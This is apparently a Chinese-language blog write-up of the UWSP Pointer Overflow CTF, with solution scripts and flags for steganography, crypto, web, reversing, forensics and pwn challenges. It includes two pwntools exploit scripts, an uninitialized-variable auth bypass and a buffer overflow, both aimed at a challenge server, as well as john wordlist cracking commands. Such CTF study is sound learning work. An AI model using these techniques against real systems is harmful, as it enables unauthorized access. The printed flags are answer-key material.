UWSP Pointer Overflow CTF

目录

Misc

Sight Without Vision

Here You See A Passer By

走迷宫

1
poctf{uwsp_pr377y_bu7_p377y_bu7_pr377y}

Steg

Absence Makes Hearts Go Yonder

给了gif

flag在文件末尾

1
poctf{uwsp_h342d_y0u_7h3_f1257_71m3}

An Invincible Summer

给了很多图片,每个图片都有两种格式,双图隐写考虑合并

随便取两张图,在sub下看到了相对奇怪的红点

保存提取,发现明文

于是写脚本来提取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import os
from PIL import Image
file_list=['CD.bmp', 'CD.jpg', 'bat.bmp', 'bat.png', 'casette.bmp', 'casette.jpg', 'hand.bmp', 'hand.jpg', 'key.bmp', 'key.jpg', 'lock.bmp', 'lock.png', 'mittens.bmp', 'mittens.jpg', 'rug.bmp', 'rug.jpg', 'tapochki.bmp', 'tapochki.jpg', 'vhs.bmp', 'vhs.jpg', 'walkman.bmp', 'walkman.jpg']
def bin2bytes(data:str):
    res=b''
    for i in range(len(data)//8):
        res+=int.to_bytes(int(data[i*8:i*8+8],2),1,'big')
    return res

def image_sub(f1:Image.Image,f2:Image.Image,name):
    f3=Image.new('1',(f1.width,f1.height))
    ch1=f1.getchannel('R')
    ch2=f2.getchannel('R')
    for i in range(f1.width):
        for j in range(f1.height):
            p1=ch1.getpixel((i,j))
            p2=ch2.getpixel((i,j))
            pixel=(abs(p1-p2))
            f3.putpixel((i,j),pixel)
    f3.save(f"{name}_sub.png")

    f=Image.open(f"{name}_sub.png")
    data = ''
    for i in range(f.height):
        for j in range(f.width):
            pixel = f.getpixel((j, i))
            if pixel == 255:
                data += '1'
            else:
                data += '0'
    data=bin2bytes(data)
    return data

for i in range(len(file_list)//2):
    f1=Image.open(file_list[i*2])
    f2=Image.open(file_list[i*2+1])
    data=image_sub(f1,f2,file_list[i*2].split('.')[0])
    print(data.strip(b'\x00').decode(errors='ignore'))

#poctf{uwsp_1_h4v3_n0_m0u7h_4nd_1_mu57_5cr34m}

Between Secrets and Lies*

Web

We Rest Upon a Single Hope

前端题

跑一下就出来了

1
poctf{uwsp_1_4m_4ll_7h47_7h3r3_15_0f_7h3_m057_r34l}

Vigil of the Ceaseless Eyes

一个论坛

直接访问即可

1
poctf{uwsp_71m3_15_4n_1llu510n}

Quantity is Not Abundance

https://blog.csdn.net/qq_55316925/article/details/128571809https://blog.csdn.net/qq_55316925/article/details/128571809

加上Referer即可

1
Referer: https://nvstgt.com/Quantity/index.html?

1
2
poctf{uwsp_1_h4v3_70_1n5157}

Crypto

Unquestioned and Unrestrained

base64

1
poctf{uwsp_411_y0u2_8453_423_8310n9_70_u5}

A Pale, Violet Light

1
2
3
4
5
e= 5039

N = 34034827

C = 933969 15848125 24252056 5387227 5511551 10881790 3267174 14500698 28242580 933969 32093017 18035208 2594090 2594090 9122397 21290815 15930721 4502231 5173234 21290815 23241728 2594090 21290815 18035208 10891227 15930721 202434 202434 21290815 5511551 202434 4502231 5173234 25243036

RSA

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import long_to_bytes,inverse
e= 5039
N = 34034827
p=5807
q=5861
C = [933969,15848125,24252056,5387227,5511551,10881790,3267174,14500698,28242580,933969,32093017,18035208,2594090,2594090,9122397,21290815,15930721,4502231,5173234,21290815,23241728,2594090,21290815,18035208,10891227,15930721,202434,202434,21290815,5511551,202434,4502231,5173234,25243036]
phi=(p-1)*(q-1)
d=inverse(e,phi)
flag=b''
for i in C:
    flag+=long_to_bytes(pow(i,d,N))
print(flag)
#poctf{uwsp_533k_4nd_y3_5h411_f1nd}

Missing and Missed

brainfuck

1
2
3
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.-.------------.+++++++++++++++++.--------------.+++++++++++++++++++++.------.++.----.---.-----------------.<<++++++++++++++++++++.-.++++++++.>>+++++++++.<<--.>>---------.++++++++++++++++++++++++.<<-----.--.>>---------.<<+++++++++.>>---------------.<<---------.++.>>.+++++++.<<--.++.+++++++.---------.+++++++..----.>>++++++++.+++++++++++++++.

poctf{uwsp_219h7_w20n9_02_f0290773n}

Crack

We Mighty, We Meek*

excel密码爆破

1
2
office2john crack1.xls > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The Gentle Rocking of the Sun

https://crackstation.net/https://crackstation.net/

1
zwischen

解压出来还是个嵌套的文件夹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import os

dir= '2023'
flag=''
while True:
    lst=os.listdir(dir)
    if '.DS_Store' in lst:
        lst.remove('.DS_Store')
    if lst:
        dir= dir + '/' + lst[0]
        flag+=lst[0]
    else:
        break
print(flag)
#poctf{uwsp_c411f02n14_d234m1n9}

With Desperation and Need*

veracrypt加密卷爆破密码

Reverse

Easy as it Gets

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
[Reflection.Assembly]::LoadWithPartialName("System.Security")  

function Encrypt-String($String, $Passphrase, $salt="SaltCrypto", $init="IV_Password", [switch]$arrayOutput)  
{  
    $r = new-Object System.Security.Cryptography.RijndaelManaged  
    $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase)  
    $salt = [Text.Encoding]::UTF8.GetBytes($salt)  
    $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) #256/8  
    $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]  
    $c = $r.CreateEncryptor()  
    $ms = new-Object IO.MemoryStream  
    $cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"Write"  
    $sw = new-Object IO.StreamWriter $cs  
    $sw.Write($String)  
    $sw.Close()  
    $cs.Close()  
    $ms.Close()  
    $r.Clear()  
    [byte[]]$result = $ms.ToArray()  
    return [Convert]::ToBase64String($result)  
}  
  
function Decrypt-String($Encrypted, $Passphrase, $salt="SaltCrypto", $init="IV_Password")  
{  
    if($Encrypted -is [string]){  
        $Encrypted = [Convert]::FromBase64String($Encrypted)  
    }  

    $r = new-Object System.Security.Cryptography.RijndaelManaged  
    $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase)  
    $salt = [Text.Encoding]::UTF8.GetBytes($salt)  
    $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) #256/8  
    $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]  
    $d = $r.CreateDecryptor()  
    $ms = new-Object IO.MemoryStream @(,$Encrypted)  
    $cs = new-Object Security.Cryptography.CryptoStream $ms,$d,"Read"  
    $sr = new-Object IO.StreamReader $cs  

    Write-Output $sr.ReadToEnd()  

    $sr.Close()  
    $cs.Close()  
    $ms.Close()  
    $r.Clear()  
}  

cls  

#### 
# TODO: use strong password
 # Canadian_Soap_Opera 
### 

$pwd = read-host "(Case Sensitive) Please Enter User Password"  

$pcrypted = "TTpgx3Ve2kkHaFNfixbAJfwLqTGQdk9dkmWJ6/t0UCBH2pGyJP/XDrXpFlejfw9d"  

write-host "Encrypted Password is: $pcrypted"  
write-host ""  
write-host "Testing Decryption of Username / Password..."  
write-host ""      

$pdecrypted = Decrypt-String $pcrypted $pwd 

write-host "Decrypted Password is: $pdecrypted"  

1
poctf{uwsp_4d_v1c70r14m_w4573l4nd3r}

A Tangled Web We Weave

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
section .data
    encoded_message db 0x0F, 0x10, 0x1C, 0x0B, 0x19, 0x04, 0x0A, 0x08, 0x0C, 0x0F, 0x20, 0x14, 0x4E, 0x11, 0x46, 0x20, 0x14, 0x4F, 0x11, 0x46, 0x20, 0x46, 0x4F, 0x48, 0x20, 0x11, 0x4F, 0x48, 0x17, 0x4E, 0x11, 0x46, 0x20, 0x4F, 0x11, 0x20, 0x12, 0x4C, 0x02

section .text
    global _start

_start:
    mov ecx, 0
    mov edi, encoded_message
    find_length:
        cmp byte [edi], 0
        je print_message
        inc ecx
        inc edi
        jmp find_length

    print_message:
        xor esi, esi
        mov edi, encoded_message
        decode:
            xor eax, eax
            mov al, byte [edi + esi]
             xor al, ; something missing? 
            mov byte [edi + esi], al
            inc esi
            cmp byte [edi + esi], 0
            jne decode

        mov edx, ecx
        mov eax, 4
        mov ebx, 1
        mov ecx, encoded_message
        int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

一眼异或加密

1
poctf{uwsp_k1n9_k0n9_907_n07h1n9_0n_m3}

Sunshine on Filth is Not Polluted

hint为

1
Uninitialized variables

在login里面可以得到shell

authcode是随机生成的

这里的confire username的username是没有初始化的,而且调试发现恰好此时local_18就是之前残留的auth_code的值

所以exp如下

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
p=remote('34.123.210.162','20231')
p.sendlineafter(b'(3) Done: ',b'2')
data=p.recvline().strip()[-2:]
auth_code=int.from_bytes(data,'little')
p.sendlineafter(b'(3) Done: ',b'1')
p.sendlineafter(b'Username: ',b'admin')
p.sendlineafter(b'(3) Done: ',b'3')
p.sendlineafter(b'Enter your authentication code: ',str(auth_code).encode())
p.interactive()
#poctf{uwsp_7h3_1355_y0u_kn0w_7h3_837732}

Forensics

If You Don’t, Remember Me

1
poctf{uwsp_w31c0m3_70_7h3_94m3}

A Petty Wage in Regret

给了一张图片

图片锐度明显有问题

第一部分在exif信息的ascii里

1
poctf{uwsp_7h3_w0rld_h4d_17_f1257}

Better to Burn in the Light

从磁盘文件中恢复文件

Master File Table

binwalk可以得到第一个flag

通过exif信息中的CLUE,可以找到第二张图

1
poctf{uwsp_5h1v3r_m3_71mb3r5}

Exploit

随便做了一道后面没做了

My Friend, A Loathsome Worm

在输入username的地方溢出,将loacl_1c的位置覆盖为0x539即可

1
2
3
4
5
6
7
8
9
10
from pwn import *

p=remote('34.123.210.162',20232)
p.sendlineafter(b'Choice: ',b'1')
p.sendlineafter(b'Enter new username: ',b'a'*28+b'\x39\x05')
p.sendlineafter(b'Choice: ',b'3')
p.interactive()
#poctf{uwsp_5w337_c10v32_4nd_50f7_511k}


许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。